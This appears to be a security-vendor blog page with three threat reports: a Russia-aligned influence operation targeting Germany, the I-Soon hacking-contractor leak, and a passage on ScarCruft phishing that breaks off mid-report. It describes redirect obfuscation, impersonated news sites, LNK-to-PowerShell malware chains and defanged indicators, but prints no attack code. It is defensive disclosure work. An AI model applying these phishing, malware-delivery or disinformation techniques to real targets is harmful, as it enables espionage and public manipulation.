โŒ

Normal view

There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Doppelgรคnger | Russia-Aligned Influence Operation Targets Germanyย 

22 February 2024 at 13:55

Executive Summary

  • SentinelLabs and ClearSky Cyber Security have been tracking the activities of a suspected Russia-aligned influence operation network named Doppelgรคnger.
  • We observed Doppelgรคnger intensively targeting German audiences, coinciding with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
  • The network spreads propaganda and disinformation through news articles focused on current socio-economic and geopolitical topics relevant to the general population.
  • Doppelgรคnger disseminates content criticizing the ruling government coalition and its support for Ukraine, likely aiming to influence public opinion before the upcoming elections in Germany.
  • Doppelgรคnger leverages a substantial network of X accounts, actively participating in coordinated activities to enhance visibility and engage audiences.

Overview

SentinelLabs and ClearSky Cyber Security have been tracking a propaganda and disinformation campaign since late November 2023, highly likely orchestrated by Doppelgรคnger, a suspected Russia-aligned influence operation network known for its persistent and aggressive tactics. Initially focusing on disseminating anti-Ukraine content following the onset of the Russo-Ukrainian conflict, Doppelgรคnger has since broadened its scope, targeting audiences in the US, Israel, Germany, and France.

We observed a significant emphasis by Doppelgรคnger on targeting German audiences. The networkโ€™s activities are characterized by consistent efforts to disseminate propaganda and disinformation content, particularly by exploiting current topics of geopolitical and socio-economic significance among the population. The majority of the content seizes every opportunity to criticize the ruling government coalition and its support for Ukraine.

With Doppelgรคnger activities intensifying in times of frequent political shifts in Germany, we suspect that the networkโ€™s goal is to erode support for the coalition in light of upcoming European Parliament, municipal, and federal state elections, culminating in federal government elections scheduled for 2025.

While we were documenting the Doppelgรคnger campaign, the German Ministry of Foreign Affairs and the prominent German media outlet Der Spiegel reported on overlapping activities, highlighting a growing concern about election interference.

In this post, we supplement existing reporting by providing additional technical indicators and insights into Doppelgรคngerโ€™s tactics and disseminated content, with the ultimate goal of further heightening public awareness of this threat.

This report focuses on Doppelgรคnger activities targeting German audiences; a complementary report by Clearsky Cyber Security delves into the networkโ€™s targeting of Israel, the United States, and Ukraine. The activities we observed closely resemble and partially overlap with those previously reported by Recorded Future and Meta, indicating the persistent nature of Doppelgรคnger.

We observed Doppelgรคnger orchestrating the operation of a large coordinated network of X (formerly known as Twitter) accounts. These accounts propagate content from third-party websites whose content aligns with Doppelgรคnger propaganda goals, as well as from sites that Doppelgรคnger itself has created.

The majority of the X accounts we discovered as part of our investigation had not been deactivated at the time of writing. In an effort to maximize visibility and audience engagement, these accounts participate in coordinated activities, such as regularly posting and reposting content from highly popular profiles, as well as engaging with posts from other suspected Doppelgรคnger-managed accounts.

The posts from these accounts contain links that redirect visitors through two stages to the destination articles intended for consumption. These stages implement obfuscation and tracking techniques. Coupled with the carefully constructed infrastructure management practices we observed Doppelgรคnger implementing, this underscores the networkโ€™s determination to operate without interruptions while effectively tracking the performance of its influence operations.

Redirection Stages

The first-stage websites, which Doppelgรคnger distributes on X, use thumbnail images hosted at telegra[.]ph to obfuscate the website thumbnails and redirect to second-stage sites.

First-stage website
First-stage website

The second-stage websites contain text unrelated to the campaign and execute a JavaScript code obfuscated using Base64-encoding.

Second-stage website
Second-stage website

The JavaScript code samples we analyzed issue a request to ggspace[.]space (reported as part of previous Doppelgaenger campaigns) or sdgqaef[.]site. The request includes tracking information, which is likely a campaign identifier. These are in the format of [country]-[day]-[month]_[domain], where [domain] refers to the domain hosting the destination article (DE-02-01_deintelligenz for an article hosted at deintelligenz[.]com). The IOC table at the end of this post lists some of the campaign identifiers we observed.

Second-stage website: Deobfuscated JavaScript code
Second-stage website: Deobfuscated JavaScript code

In addition, the JavaScript code executed by second-stage websites dynamically loads another JavaScript code provided by ggspace[.]space or sdgqaef[.]site, which implements logic for generating web content that redirects to a destination article.

JavaScript code from sdgqaef[.]site

JavaScript code from sdgqaef[.]site
JavaScript code from sdgqaef[.]site

sdgqaef[.]site and ggspace[.]space host at the /admin URL path a login page, which has been assessed to be of the Keitaro Tracking System. Doppelgaenger possibly uses Keitaro to track the effectiveness of its campaigns.

Login page hosted at sdgqaef[.]site
Login page hosted at sdgqaef[.]site

Social Media Activities

Probably in an attempt to increase their visibility, some of the suspected Doppelgรคnger-managed X accounts we identified regularly post content, which does not necessarily contain first-stage websites, whereas others remain idle for relatively long time periods.


An active and idle suspected Doppelgรคnger account
An active and idle suspected Doppelgรคnger account

We observed accounts posting content linking to first-stage sites in multiple languages of the targeted audiences. Further, the Doppelgรคngerโ€™s account network is probably attempting to increase the engagement metrics of posts that link to first-stage websites in a targeted manner through reposts and views. This becomes evident when these metrics are compared with the metrics of posts by the same accounts that do not link to first-stage websites.

Multi-language posts tailored to the targeted audiences
Multi-language posts tailored to the targeted audiences
Engagement metric discrepancies
Engagement metric discrepancies

We identified multiple clusters of suspected Doppelgรคnger-managed accounts which have joined the X platform within the same month. We observed a significant level of coordination in the activities of the accounts within the same cluster, suggesting centralized control. This includes reposting of the same content at almost the same time, typically that of highly popular profiles. In addition, engagement metrics of posts that link to first-stage sites by suspected Doppelgรคnger accounts within the same cluster often have very similar engagement metrics.


Coordinated activities
Coordinated activities

Engagement metric similarities
Engagement metric similarities

Our analysis of the engagement metrics for almost all the accounts we identified revealed a range of reposts between 700 and 2000, with a median value of 883, and a range of views between 613 and 14000, with a median value of 5000.

Propaganda and Disinformation Content

Doppelgรคnger has been very active in creating websites that host articles for consumption by targeted audiences through the previously described multi-stage approach. Among these sites, there are domains and websites impersonating third-party news outlets, which includes mimicking their design, structure, and domain names, such as welt[.]pm (inauthentic) vs. welt[.]de (authentic) and faz[.]ltd (inauthentic) vs. faz[.]net (authentic). We assess that the rest of the websites we observed have been created by Doppelgรคnger with original design and structure and no indications of impersonating established news platforms.

In most cases, we observed consistent and regular publishing of new content, with only occasional idle periods lasting a few days at most. Some of the content consists of a blend of materials sourced from other websites and translated into the languages of the targeted audiences.

A closer look at the custom-built websites indicates that Doppelgรคnger has been making a fast-paced effort to bring its websites online and start distributing content. For example, some sites include template text or exhibit errors in search functionalities. Furthermore, nearly all of these websites lack social media presence. They display icons of social media platforms that link to the domains of these platforms rather than specific profiles.

Template text (emphasis added)
Template text (emphasis added)

Many of the custom-built websites have been built and are managed using the WordPress content management system. We observed that some websites display status messages in Russian when users perform content searches and the activity fails with an error, indicating the use of Russian-language WordPress components.

Wordpress status message translates to โ€œSearch forโ€
WordPress status message translates to โ€œSearch forโ€

The majority of the articles Doppelgรคnger distributes have a strong anti-government narrative, especially in regard to the governmentโ€™s support of Ukraine. The article snippets we present below are machine-translated from German into English.

An article at arbeitspause[.]org discusses a recent series of strikes by workers in the German public transport demanding better wages and better working conditions. The challenges relating to the state of workers in this sector, such as rising living costs due to inflation and shortage of workers, are a pressing concern in Germany that captures the attention of the broader population.

Article snippet from <i>arbeitspause[.]org</i>, referencing Scholz, the German chancellor (emphasis added)
Article snippet from arbeitspause[.]org, referencing Scholz, the German chancellor (emphasis added)

On a similar note, another article at arbeitspause[.]org focuses on the recent strikes by German farmers, which involved the blockade of major roads and were motivated by rising living costs and the governmentโ€™s plan to phase out agricultural subsidies. Overlapping at times with the strikes in the public transport sectors, the farmersโ€™ strikes have been disrupting mobility and therefore garnered the attention of the population and mass media. Doppelgรคnger has attempted to capitalize on the momentum by criticizing the governmentโ€™s plan regarding agricultural subsidies, drawing a connection to the governmentโ€™s support for Ukraine.

Article snippet from arbeitspause[.]org
Article snippet from arbeitspause[.]org

An article at derglaube[.]com focuses on the German immigration policy, which, according to some polls, ranks among the top issues for voters in Germany. In addition, the media frequently covers topics relating to the governmentโ€™s allocation of funds for immigration-related programs and services. Consistent with typical Doppelgรคnger practices, the influence operation network uses this opportunity to cast the government in a negative light and introduce its support for Ukraine into the narrative.

Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (emphasis added)
Article snippet from derglaube[.]com (emphasis added)

In an attempt to blend political-oriented propaganda or disinformation among other topics, some websites host articles covering broader subjects such as health, sports, and culture. We observed attempts to introduce propaganda even in such articles. For example, an article hosted at miastagebuch[.]com initially discusses headaches from a medical perspective only to later indicate the German government as one of the major causes of headaches.

Anti-government statements in a health-themed article (emphasis added)
Anti-government statements in a health-themed article (emphasis added)

We emphasize that Doppelgรคnger also targets Germany through articles published by third-party outlets, such as telepolis[.]de, freiewelt[.]net, overton-magazin[.]de, and deutschlandkurier[.]de.

The articles from these outlets that Doppelgรคnger disseminates focus on both domestic and international topics, some with a strong anti-Western narrative. For instance, an article from overton-magazin[.]de portrays the West as profiteering from the Russo-Ukrainian conflict, while depicting Ukraine as a plaything of Western global players (cit.).

Article snippet from overton-magazin[.]de (emphasis added)
Article snippet from overton-magazin[.]de (emphasis added)

Additionally, an article from osthessen-news[.]de highlights factors such as the Ukraine war and inflation as contributors to economic challenges in Germany, prompting medium-sized companies to consider restructuring due to escalating costs. Issues concerning small- and mid-sized companies are particularly relevant to the broader German audience, given their significant contribution to the countryโ€™s overall economy.

Article snippet from osthessen-news[.]de
Article snippet from osthessen-news[.]de

Infrastructure

The Doppelgรคnger infrastructure can be structured into four parts subject to different infrastructure management and control practices, with each part designated to hosting the different entities involved in disseminating content for consumption by targeted audiences: the first-stage and second-stage redirection websites, the servers likely used for monitoring campaign performance (ggspace[.]space and sdgqaef[.]site), and the destination websites.

The first-stage and second-stage websites often shift between a variety of hosting providers, such as Hostinger, Global Internet Solutions, and Digital Ocean. The domains of these websites typically have short lifespans, lasting only several days at a time and recurring multiple times over a few years. We observe that Doppelgรคnger activates the domains for brief periods during its campaigns before deactivating them again.

The domains of the first-stage websites have a diverse range of top-level domains (TLDs), including generic TLDs such as .buzz, .art, .store, .site, and .online, as well as country code TLDs like .co.uk and .br. The domainsโ€™ format suggests an automated generation approach involving the creation of subdomains and numerical suffixes, for example, pcrrjx.kredit-money-fun169[.]buzz and yzrhhk.kredit-money-fun202[.]buzz.

This strategy, combined with the frequent rotation between hosting providers and the cyclical nature of the domains, indicates an effort by Doppelgรคnger to evade detection and tracking of its first-stage infrastructure, which is exposed on social media platforms and therefore more likely to be subjected to scrutiny. Doppelgรคnger does not apply the same domain naming convention to second-stage websites, which are not directly exposed on social media platforms.

Playing a central role in Doppelgรคngerโ€™s campaigns, ggspace[.]space and sdgqaef[.]site are responsible for both redirection and presumably monitoring campaign performance. They are hosted behind a Cloud-based reverse proxy infrastructure, likely implemented as a security measure to obfuscate their true hosting locations. In contrast to the first-stage and second-stage domains, the active periods of these domains typically span several months during Doppelgรคngerโ€™s campaigns.

Many of the servers hosting the destination websites are managed using cPanel, and some implement geofencing, which restricts traffic to IP addresses from targeted countries. This practice is likely intended to minimize exposure of their infrastructure and content to scrutiny and monitoring by researchers or authorities outside those regions, reducing the likelihood of detection and investigation into Doppelgรคngerโ€™s activities.

The domains of the majority of these websites were first registered in the first quarter of 2023 and some as early as mid-2022, remaining active as of the time of writing. A smaller subset of domains, such as derglaube[.]com, which we assess with high confidence as being managed by Doppelgรคnger at this time, have been active for nearly 10 years, with intermittent periods of inactivity lasting a few years at most.

Conclusions

Doppelgรคnger represents an active instrument of information warfare, characterized by strategic use of propaganda and disinformation to influence public opinion. The campaign targeting Germany we discussed in this post serves as a compelling example of the persistent and continually evolving nature of Russia-aligned influence operations, which exploit social media and current topics of geopolitical and socio-economic significance to shape perceptions.

We anticipate that Doppelgรคngerโ€™s activities, targeting not only Germany but also other Western countries, will persist and evolve, particularly in light of the major elections scheduled across the EU and the USA in the coming years. We expect Doppelgรคnger to continue innovating its infrastructure and obfuscation tactics to make its activities more difficult to detect and disrupt.

We emphasize that countering influence operations requires a comprehensive and collaborative approach, involving enhancing public awareness and media literacy to identify and resist manipulation, alongside prompt and effective actions by social media platforms and infrastructure operators to limit the spread of propaganda and disinformation online.

SentinelLabs continues to monitor Doppelgรคnger activities and remains committed to timely reporting on its operations to improve public awareness of this threat and mitigate its impact.

Indicators of Compromise

Due to the extensive volume of observed indicators, we present here only a selection, including indicators from parallel campaigns targeting France alongside those targeting German audiences.

Domains

Value Note
09474w.reyt-cre-ad34[.]buzz First-stage website
1wifsq.c-majac-ann4[.]buzz First-stage website
3wk8wa.kariz-good-ad10[.]buzz First-stage website
62ogyy[.]internetbusinesslondon[.]co[.]uk First-stage website
6fmb3r[.]great-cred195[.]buzz First-stage website
allons-y[.]social Doppelgรคnger-managed destination website
antiwar[.]com Third-party website whose articles Doppelgรคnger disseminates
arbeitspause[.]org Doppelgรคnger-managed destination website
arizztar[.]com Second-stage website
bfmtv[.]com Third-party website whose articles Doppelgรคnger disseminates
bluetoffee-books[.]com Second-stage website
brennendefrage[.]com Doppelgรคnger-managed destination website
buegym.ranking-kariz108[.]buzz First-stage website
contre-attaque[.]net Third-party website whose articles Doppelgรคnger disseminates
d6egyr.borafazerfestaoficial[.]online First-stage website
deintelligenz[.]com Doppelgรคnger-managed destination website
derbayerischelowe[.]info Doppelgรคnger-managed destination website
derglaube[.]com Doppelgรคnger-managed destination website
derrattenfanger[.]net Doppelgรคnger-managed destination website
deutschlandkurier[.]de Third-party website whose articles Doppelgรคnger disseminates
faridmehdipour[.]com Second-stage website
faz[.]ltd Doppelgรคnger-managed destination website
freeebooktemplates[.]com Second-stage website
freiewelt[.]net Third-party website whose articles Doppelgรคnger disseminates
ggspace[.]space Server likely used for monitoring campaign performance
grunehummel[.]com Doppelgรคnger-managed destination website
histoireetsociete[.]com Third-party website whose articles Doppelgรคnger disseminates
hungarianconservative[.]com Third-party website whose articles Doppelgรคnger disseminates
jungefreiheit[.]de Third-party website whose articles Doppelgรคnger disseminates
kaputteampel[.]com Doppelgรคnger-managed destination website
ledialogue[.]fr Third-party website whose articles Doppelgรคnger disseminates
legrandsoir[.]info Third-party website whose articles Doppelgรคnger disseminates
leparisien[.]re Doppelgรคnger-managed destination website
lildoxi[.]com Second-stage website
miastagebuch[.]com Doppelgรคnger-managed destination website
mt-secure-bnk[.]com Second-stage website
nice-credits-list266[.]buzz First-stage website
nw3m7o.samaritana.com[.]br First-stage website
o21obd.reyt-credbest-mx29[.]buzz First-stage website
osthessen-news[.]de Third-party website whose articles Doppelgรคnger disseminates
overton-magazin[.]de Third-party website whose articles Doppelgรคnger disseminates
pcrrjx.kredit-money-fun169[.]buzz First-stage website
profesionalvirtual[.]com Second-stage website
realpeoplesreviews[.]com Second-stage website
referendud[.]com Second-stage website
restuapp[.]com Second-stage website
sbl63p.kredit-money-fun274[.]buzz First-stage website
sdgqaef[.]site Server likely used for monitoring campaign performance
sueddeutsche[.]ltd Doppelgรคnger-managed destination website
telepolis[.]de Third-party website whose articles Doppelgรคnger disseminates
uncut-news[.]ch Third-party website whose articles Doppelgรคnger disseminates
v5yoaq.chilling[.]lol First-stage website
voltairenet[.]org Third-party website whose articles Doppelgรคnger disseminates
wanderfalke[.]net Doppelgรคnger-managed destination website
welt[.]pm Doppelgรคnger-managed destination website
www.nachdenkseiten[.]de Third-party website whose articles Doppelgรคnger disseminates
yzrhhk.kredit-money-fun202[.]buzz First-stage website

Campaign Identifiers

DE-02-01_deintelligenz
DE-09-01_derrattenfanger
DE-13-01_nachdenkseiten_-2
DE-13-01_telepolis_-2
DE-15-11_deutschlandkurier
DE-17-11_jungefreiheit
DE-21-11_freiewelt
DE-23-12-2_arbeitspause
DE-23-12-2_arbeitspause
DE-24-11_grunehummel
DE-25-01_brennendefrage
DE-25-01_derglaube
DE-25-01_welt
DE-27-12_faz
DE-27-12_miastagebuch_-2
DE-27-12_sueddeutsche
DE-29-01_derbayerischelowe
FR-03-02_candidat
FR-03-02_lexomnium_-2
FR-04-02_allons-y
FR-13-01_original
FR-19-01_bfmtv_s
FR-23-12-2_franceeteu
FR-23-12-2_leparisien
FR-25-01_la-sante
FR-26-12_hungarianconservative
FR-26-12_lepoint_-2
FR-26-12_voltairenet
FR-27-12_ledialogue
FR-27-12_lesfrontieres

Suspected Doppelgรคnger-managed X/Twitter Accounts

AyniyeMcca18343
Brent8332812692
ButzlaffF6068
chareaterc59681
Chris423806
Dan2082135
elasagev1981744
Equinoxevt4
Eric69112331297
Eric81026324555
izaguine65954
jacksanbac66126
Jermaine1384705
Jermaine1384705
Jim388251815042
Joseph673224507
Joseph673224507
Kevin1135109
Kristin1039811
Marc182057
Marc1826509
Mark5768674550
MeadowOf43589
MehetabelW87922
MGlasscock91268
Mike3614071710
MingoGerri92116
MissyVoorh3954
MitchamNis5726
MKarg84246
ModestiaH56404
ModestineF72279
MonteroTer52325
MontesRodi62373
moore_tess5916
MorelockSo28285
MorganMcqu33699
MunroHelen78796
MurdockTip96177
myrta53009
NancyOrona49857
NannySpeer51042
NatalaWelb47593
Natasha90680770
NaylorVida41053
NCraighead92692
NFridley71438
Nikki9265841534
NikoliaE39574
NJean52219
NKuehner28951
OClodfelte8787
of_navy23563
of_novelis81275
OlguinElsy987
Oliver1325592
Omar37785134192
Pam807954589169
PauliHarry9140
PegeenD80598
Pete1192428369
Rayshaw78069964
Rounak1685212
Tim298432442090

Unmasking I-Soon | The Leak That Revealed Chinaโ€™s Cyber Operations

Executive Summary

  • I-Soon (ไธŠๆตทๅฎ‰ๆดต), a company that contracts for many PRC agenciesโ€“including the Ministry of Public Security, Ministry of State Security, and Peopleโ€™s Liberation Armyโ€“was subject to a data leak over the weekend of Feb 16th. It is not known who pilfered the information nor their motives, but this leak provides a first-of-its-kind look at the internal operations of a state-affiliated hacking contractor. The authenticity of the documents is still undecided. While the leakโ€™s contents do confirm public threat intelligence, efforts to corroborate further the documents are on-going.
  • The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of Chinaโ€™s cyber espionage ecosystem. It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.
  • I-Soonโ€“whose employees complain about low pay and gamble over mahjong in the officeโ€“appears to be responsible for the compromise of at least 14 governments, pro-democracy organizations in Hong Kong, universities, and NATO. The leaked documents align with previous threat intel on several named threat groups.
  • Victim data and targeting lists, as well as names of the clients who requested them, show a company who competes for low-value hacking contracts from many government agencies. The finding indicates that historical targeting information from Advanced Persistent Threats thought to be PRC contractors does not provide strong guidance on future targets.
  • Machine translation enabled the rapid consumption of leaked data. These tools broadened the initial analysis of the information beyond seasoned China experts with specialized language skills and technical knowledge. This has enabled many more analysts to scan the leaked information and quickly extract and socialize findings. As researchers dig into the voluminous information, domain expertise will be required to understand the complex relationships and implicit patterns between the relevant organizations, companies, and individuals. One upshot is that geographically-specialized analysis will continue to provide distinct value, but the barrier to entry is much lower.

Initial Observations

  1. At 10:19 pm on January 15th, someone, somewhere, registered the email address [email protected]. One month later, on February 16th, an account registered by that email began uploading content to GitHub. Among the files uploaded were dozens of marketing documents, images and screenshots, and thousands of WeChat messages between employees and clients of I-SOON. An analyst based in Taiwan found the document trove on GitHub and shared their findings on social media.
  2. Many of the files are versions of marketing materials intended to advertiseย  the company and its services to potential customers. In a bid to get work in Xinjiangโ€“where China subjects millions of Ugyhurs to what the UN Human Rights Council has called genocideโ€“the company bragged about past counterterrorism work. The company listed other terrorism-related targets the company had hacked previously as evidence of their ability to perform these tasks, including targeting counterterrorism centers in Pakistan and Afghanistan.ย 
  3. Elsewhere, technical documents demonstrated to potential buyers how the companyโ€™s products function to compromise and exploit targets. Listed in the documentation were pictures of custom hardware snooping devices, including a tool meant to look like a powerbank that actually passed data from the victimโ€™s network back to the hackers. Other documentation diagrammed some of the inner workings of I-SOONโ€™s offensive toolkit. While none were surprising or outlandish capabilities, they confirmed that the companyโ€™s main source of revenue is hacking for hire and offensive capabilities.
  4. The leaked documents provide indicatorsโ€“such as command-and-control infrastructure, malware, and victimologyโ€“which relate to suspected Chinese cyberespionage activities previously observed by the threat intelligence community. Initial observations point to activities spanning a variety of targeted industry sectors and organizations as well as APT groups and intrusion sets, which the threat intelligence community tracks, or has been tracking, as distinct clusters. The extent and strength of the relationships between indicators present in the leaked data and past intrusions are still subject to detailed evaluation.
  5. The selection of documents and chats leaked on GitHub seem meant to embarrass the company, but they also raise key questions for the cybersecurity community. One document lists out targeted organizations and the fees the company earned by hacking them. Collecting data from Vietnamโ€™s Ministry of Economy paid out $55,000, other ministries were worth less. Another leaked messaging exchange shows an employee hacking into a university not on the targeting list, only for their supervisor to brush it off as an accident. Employees complained about low pay and hoped to get jobs at other companies, such as Qi An Xin.

Conclusion

The leaked documents offer the threat intelligence community a unique opportunity to reevaluate past attribution efforts and gain a deeper understanding of the complex Chinese threat landscape. This evaluation is essential for keeping up with a complex threat landscape and improving defense strategies.

Extensive sharing of malware and infrastructure management processes between groups makes high-confidence clustering difficult. As demonstrated by the leaked documents, third-party contractors play a significant role in facilitating and executing many of Chinaโ€™s offensive operations in the cyber domain.

For defenders and business leaders, the lesson is plain and uncomfortable. Your organizationโ€™s threat model likely includes underpaid technical experts making a fraction of the value they may pilfer from your organization. This should be a wakeup call and a call to action.

ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of Scarcruftโ€™s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targetingย experts in North Korean affairs from South Koreaโ€™s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruftโ€™s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruftโ€™s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Checkpoint in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Koreaโ€™s decision-making processes.

ScarCruftโ€™s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studiesย  โ€“ INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual โ€” an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

ScarCruft Phishing email (in Korean)
Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoftโ€™s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename Machine translation
1. ์ „์˜์„  ๋ถํ•œ ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp 1. Jeon Young-seonโ€™s plan to strengthen North Korean residentsโ€™ right to access information.hwp
2.์ด์ƒ์šฉ ๋ฐ˜๋™์‚ฌ์ƒ๋ฌธํ™”๋ฐฐ๊ฒฉ๋ฒ•๊ณผ ์ •๋ณด ์œ ์ž… ํ™œ๋™์˜ ๋ณ€ํ™”.pptx 2. Lee Sang-yongโ€™s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk 3. Lee Yun-sikโ€™s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. ์—ฌํ˜„์ฒ  ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™” ๋ฐฉ์•ˆ.hwp 5. Yeo Hyeon-cheolโ€™s plan to strengthen North Korean residentsโ€™ right to access information.hwp
6. ์ด์ข…๊ฒธ ๋ถํ•œ์ธ๊ถŒ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. ๋ฐ•์œ ์„ฑ ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp 7. Park Yoo-sungโ€™s plan to strengthen North Korean residentsโ€™ access to information.hwp
8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. ๊น€ํƒœ์› ๋ถํ•œ์ธ๊ถŒ ์ „๋ฌธ๊ฐ€ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. ์„œ์œ ์„ ๋ถํ•œ ์ฃผ๋ฏผ๋“ค์˜ ์•Œ๊ถŒ๋ฆฌ ์ œ๊ณ  ๋ฐฉ์•ˆ.hwp 10. Seo Yoo-seokโ€™s plan to improve North Korean residentsโ€™ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

ScarCruft Infection chain: 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk
Infection chain: 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its filesize.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.

ScarCruft PowerShell code
PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat
The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip implements a shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.

ScarCruft PowerShell script executing shellcode
PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the documentโ€™s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means โ€˜fireflyโ€™ in Korean.

The bandi pseudonym (HWPX document metadata)
The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks of the adversaryโ€™s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(ํšŒ๋ น).hwp (Shipbuilding market price analysis (Hoeryeong).hwp) and ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(์‹ ์˜์ฃผ).hwp (Shipbuilding market price analysis (Sinuiju).hwp, machine translation from Korean), disguised as North Korean market price analysis data.

Phishing email (in Korean)
Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the documentโ€™s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

